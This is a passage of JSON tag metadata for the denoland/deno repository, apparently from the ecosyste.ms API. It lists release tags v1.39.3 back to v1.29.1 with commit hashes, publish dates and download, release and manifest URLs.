deno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/